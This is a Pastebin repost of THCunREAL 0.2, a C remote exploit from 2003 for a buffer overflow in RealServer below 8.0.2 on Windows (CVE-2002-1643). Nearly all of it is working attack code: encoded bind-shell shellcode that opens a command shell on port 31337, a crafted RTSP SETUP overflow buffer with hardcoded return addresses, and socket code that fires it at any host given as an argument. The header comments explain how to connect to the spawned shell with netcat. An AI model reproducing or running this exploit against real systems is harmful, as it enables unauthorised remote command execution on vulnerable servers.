FlyFar

RealServer < 8.0.2 (Windows Platforms) - Remote Overflow - CVE-2002-1643

Jan 26th, 2024
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.01 KB | Cybersecurity | 0 0
  1. /*************************************************************/
  2. /* THCunREAL 0.2 - Wind0wZ remote root exploit                                    */
  3. /* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)        */
  4. /* THC PUBLIC SOURCE MATERIALS                                                       */
  5. /*                                                                                                      */
  6. /*                                                                                                      */
  7. /* This is the much more reliable version of the Realserver < 8.0.2 exploit */
  8. /* Tested with different OSes and Realserver Versions                              */
  9. /*                                                                                                      */
  10. /* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554  */
  11. /* i noticed that 99% of the probed machines are not up2date yet ! =;O)   */
  12. /*                                                                                                      */
  13. /* The shellcode is much shorter than the one in version 0.1 now and of    */
  14. /* course offsetless ! The encoder in front of the exploit is needed coz the */
  15. /* shellcode has next to 0x00,0x0d,0x0a also to be 0x20 and 0xff free !   */
  16. /*                                                                                                      */
  17. /* After successful exploitation  a commandshell should spawn on             */
  18. /* TCP port 31337 ! Use netcat to connect to this port !                            */
  19. /*                                                                                                      */
  20. /* If there's no connectable port 31337, maybe it's blocked by a firewall !  */
  21. /*                                                                                                      */
  22. /* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8   */
  23. /* runs on. I just know it's also exploitable on other OSs !                        */
  24. /* So if u wanna exploit other platforms, try to get Realserver 8 and use    */
  25. /* gdb to find out, how this can be exploited ! Good luck !                        */
  26. /*                                                                                                      */
  27. /* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib                */
  28. /*                                                                                                      */
  29. /************************************************************/
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <string.h>
  34. #include <winsock2.h>
  35.  
  36. char w32portshell[] =
  37. "\x8b\xfa\x33\xc9\xb2\x35\x90\x90\x90\x66\x81\xc1\x38\x01\x83"
  38. "\xc7\x1a\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16\x4f\x5c"
  39. "\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1\x36\xc5"
  40. "\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71\x79\x79"
  41. "\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f\x05\x6c"
  42. "\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d\xb8\x6a"
  43. "\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29\x34\xcc"
  44. "\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce\x04\xfc"
  45. "\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4\xd7\xb1"
  46. "\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c\x25\x40"
  47. "\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25\x74\x3a"
  48. "\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc\x71\xb8"
  49. "\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78\x17\xb8"
  50. "\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30\xb5\x70"
  51. "\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca\xca\xbc"
  52. "\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2\x60\x6d"
  53. "\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62\xca\x60"
  54. "\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca\x60\xd1"
  55. "\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b\x50\x4d"
  56. "\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1\x62\x62"
  57. "\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65\xb8\x70"
  58. "\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66\x66\x60"
  59. "\xca\x60\xd9\x5f\xca\xca\x60\xd5";
  60.  
  61. void usage();
  62.  
  63. int main(int argc, char *argv[])
  64. {
  65. unsigned short realport=554;
  66. unsigned int sock,addr,i,rc;
  67. unsigned char exploit_buffer[4132];
  68. unsigned long retloc1,retloc2,retaddr;
  69. struct sockaddr_in mytcp;
  70. struct hostent * hp;
  71. WSADATA wsaData;
  72.  
  73. printf("\nTHCunREAL v0.2 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
  74. printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
  75.  
  76. if(argc<2)
  77. usage();
  78.  
  79. retloc1 = 0x6235108c;
  80. retloc2 = 0x623514b6;
  81. retaddr = 0x62354f5e;
  82.  
  83. memset(exploit_buffer,'Z',4131);
  84. memcpy(exploit_buffer,"SETUP /",7);
  85. *(unsigned long *)&exploit_buffer[4082] = retloc1;
  86. *(unsigned long *)&exploit_buffer[4086] = retloc2;
  87. memcpy(&exploit_buffer[7],w32portshell,strlen(w32portshell));
  88. *(unsigned long *)&exploit_buffer[4090] = retaddr;
  89. memcpy(&exploit_buffer[4094],"\x83\xc2\x19\x52\xc3",5);
  90. memcpy(&exploit_buffer[4099]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
  91.  
  92. if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
  93. {
  94. printf("WSAStartup failed !\n");
  95. exit(-1);
  96. }
  97.  
  98. hp = gethostbyname(argv[1]);
  99.  
  100. if (!hp){
  101. addr = inet_addr(argv[1]);
  102. }
  103. if ((!hp) && (addr == INADDR_NONE) )
  104. {
  105. printf("Unable to resolve %s\n",argv[1]);
  106. exit(-1);
  107. }
  108.  
  109. sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  110. if (!sock)
  111. {
  112. printf("socket() error...\n");
  113. exit(-1);
  114. }
  115.  
  116. if (hp != NULL)
  117. memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
  118. else
  119. mytcp.sin_addr.s_addr = addr;
  120.  
  121. if (hp)
  122. mytcp.sin_family = hp->h_addrtype;
  123. else
  124. mytcp.sin_family = AF_INET;
  125.  
  126. mytcp.sin_port=htons(realport);
  127.  
  128. rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
  129. if(rc==0)
  130. {
  131. send(sock,exploit_buffer,4131,0);
  132. printf("\nexploit send .... sleeping a while ....\n");
  133. Sleep(1000);
  134. printf("\nok ... now try to connect to port 31337 via netcat !\n");
  135. }
  136. else
  137. printf("can't connect to realserver port!\n");
  138.  
  139. shutdown(sock,1);
  140. closesocket(sock);
  141. exit(0);
  142. }
  143.  
  144. void usage()
  145. {
  146. printf("\nUsage: <Host>\n");
  147. exit(0);
  148. }
  149.  
  150.  
  151. // milw0rm.com [2003-04-30]
Add Comment
Please, Sign In to add comment